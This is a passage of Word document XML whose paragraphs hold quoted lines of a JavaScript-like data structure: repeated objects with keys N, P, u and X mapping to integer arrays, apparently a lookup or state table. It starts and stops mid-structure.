    <w:p w14:paraId="5562CBBE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [69, 85]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F2472" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95FCE3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E135147" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5621EF34" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 5, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE272A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00549B67" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DA7D48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01051C36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17F871" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA2E30F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [5, 8, 3, 2, 4, 7, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDC437" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418D3EEF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B41F34" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331DF990" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFBE3D4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FFFAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E06A84" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A62F52F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716504DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B783E45" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9A885" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2CCC9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E370607" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEEE733" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B287342" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA7BD4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD271D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72627F17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2836D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2668BFFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A537C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A817838" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDAA5A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 5, 6, 8, 35, 333]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD0666" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB70BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 8, 3, 4, 7, 6, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C80DBE7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680ED35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B18DE3F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413087A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4939183F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E640041" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A8F82" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C105C86" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA428A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06979B60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0130734B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3A750" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF68233" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDD789" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C728A19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4128A711" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [34, 44]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9E03AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFEF24" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24863C7A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCAECA9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 20, 29]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5EF28" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53148A40" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608A658" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E269CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0152D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D39729" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5ADB4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C3041" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 50, 223]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3FD30" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2344F088" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CC5FEF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09891517" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFACED9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DE3D37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF2D7E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0EB54" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0C3F7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115ABB64" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D3AAF1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3351C18F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 14, 16, 18]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627B54E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30750679" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148620A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F988E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 21]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC8363" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3933EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7389BF18" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674FE53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514D5A58" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8FB18B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669AF796" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62192A61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7BB2DC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7689AA23" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A51099D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA7A1E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5B9F94" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505999A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E2828F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B78B14" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5F6404" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188CE0EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D6DB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585DC5F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63DD7C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 280]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4134C7FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9557C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 5, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32813357" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B5A69" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE844C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA2C5C7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 8, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A546F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D60AF4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F0A4E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB401B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407299E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D47C20" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA966A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E594298" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C6BC8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [18, 6, 7, 5, 14, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F91BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A65DA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [125, 151, 159, 239, 264, 292, 311, 317, 332]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66634AF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F151D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3119A764" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40378776" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 321]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D54956E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F57574" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [17, 9, 47, 24, 44, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7AA7A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 19, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243BACC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 20, 50, 89, 106, 124, 128, 159, 170, 179, 195, 223, 226, 227, 245, 311, 317, 329, 337]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6211F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
